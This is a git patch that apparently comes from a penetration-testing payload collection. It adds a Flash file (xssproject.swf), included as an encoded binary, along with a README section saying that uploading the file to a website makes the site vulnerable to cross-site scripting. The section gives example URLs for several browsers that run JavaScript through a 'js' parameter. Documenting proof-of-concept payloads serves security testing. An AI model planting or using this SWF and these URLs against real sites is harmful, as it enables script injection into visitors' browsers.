From d10fb82647e0739d36ed43cced6bcaefd8c98eaa Mon Sep 17 00:00:00 2001 From: Jason Haddix Date: Tue, 3 Nov 2015 12:45:34 -0800 Subject: [PATCH] adding swf xss file adding swf xss file --- Payloads/README.md | 16 +++++++++++++++- Payloads/xssproject.swf | Bin 0 -> 1053 bytes 2 files changed, 15 insertions(+), 1 deletion(-) create mode 100644 Payloads/xssproject.swf diff --git a/Payloads/README.md b/Payloads/README.md index d8c70a09..910420bb 100644 --- a/Payloads/README.md +++ b/Payloads/README.md @@ -26,4 +26,18 @@ The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file th Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured. -The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file. \ No newline at end of file +The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file. + +## xssproject File + +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. + +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +Examples: + +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); \ No newline at end of file diff --git a/Payloads/xssproject.swf b/Payloads/xssproject.swf new file mode 100644 index 0000000000000000000000000000000000000000..a0e7b36ce12df577b2d2a4a4987610596dfced2e GIT binary patch literal 1053 zcmV+&1mgQcS5ppY1^@tf0cBL(Qrkup-qqTc|78O);6S4^G>!?jWWz9nA)ZnU8EzmG zUnIkz@hs8`E0MJtNycV6nZ8LUz3FT80dnJBv=7j$&h(=06QnDNAWSr)pFQV0-+pJ$ zIU0l5UjXEP1z-t+PH`Ck@YDP!2*94B>8;nDBXK-1Ew{y1FDiY{vs;oh8jb3s%{p~1 zrN++AjwCmwX0yf+HTT-`@VI8VPb%$zphH~MF>KGEmgp1W3p(^(R4O;DntDrW4;?e0 z)KrO>WI!y>l^XR1Bhu8CPMrbv+Ss;DL&ZLwG_JXQs=goLD^k-5M7}z8m6G*ux9caQnn* z53TnW9a#Y?vica+A=sm{h%YwZZ({3mh%ZU|@Fa-7T?ZPmN7^U!N^Hm*VpDE3Lm9qx zPx4Rq&S~FRSOME0Ul=Z*oYr3Lce`&+Uw6PnU{#*EI)%T{9ys7WfBt-yM$DC9cP#PC zS%}KupZ{sGp7@l0+wHz`=sTi%;J1Zr3;<>YcZ>y4_d}lF1u6%v^A1&qK}khyX=0an zo?%_O=lj~gungC8{6k@@uvDy;;txZ^)QBT))wj)SY zcbyG7qV8V19vQ&(3^q+V>d*l;tm5I=BaVg5V~f3Ytde{PCO7uE0e0Lzi#QysBxqe% zkgK~NSl_ArXQcY$huxS%sh2h>W)hDrou+N<-~nNLF89tAB1uf(n*8{tp`vEm?`}#> zS>Bc|Seoo87D5G@;o2s?Zgp*z16i9jc0%Xrg@5`7lnt6;5$Dk?D98z`o^eG&;KNz} z49QC9BUk>cwGRE4@AuOr4kt-5l^sI-&~c~(Nt_i)B@d$1r06p@vq>V9p9lpA_jqqA z6K2`{Yi!gp+#I5rTg?7;!RG?8DjsX{0%^#4QC;v;uXw!5?w3 zI?X6ZM^ABVn)g38vPxW!>j|CLlOH#hJ|3kQL@2BPFp++U}qw;Z4(42f-cBPK`+QkQ7_8MoIWQj^ZLB3Lai&_BzxOxzo@M?&Q^o1D7wiO2 literal 0 HcmV?d00001